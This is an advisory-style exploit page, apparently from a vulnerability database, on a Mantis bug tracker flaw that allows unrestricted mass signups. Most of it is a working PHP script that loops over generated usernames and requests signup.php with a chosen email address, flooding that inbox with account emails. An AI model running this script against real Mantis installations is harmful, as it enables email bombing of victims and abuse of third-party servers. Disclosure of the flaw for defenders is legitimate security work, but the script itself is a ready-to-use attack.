• info
• discussion
• exploit
• solution
• references

Mantis New Account Signup Mass Emailing Vulnerability

An exploit is not required. An example script capable of exploiting this vulerability was provided:

<?php

//Please, change it becuase is my e-mail :)
$email = "anyemail@address";
$base_user = "test";
$i = 0;
$site = "http://www.example.com";

for ($i=0;$i<=15;$i++)
{
echo("Sending e-mail number $i\n");
$user = "$base_user$i";
echo("New user is $user\n");
$url =
"http://$site/signup.php?username=$user&email=$email";
echo("URL is $url\n");
$fd = fopen($url,"r");
echo("E-mail $i sended\n");
fclose($fd);
}

?>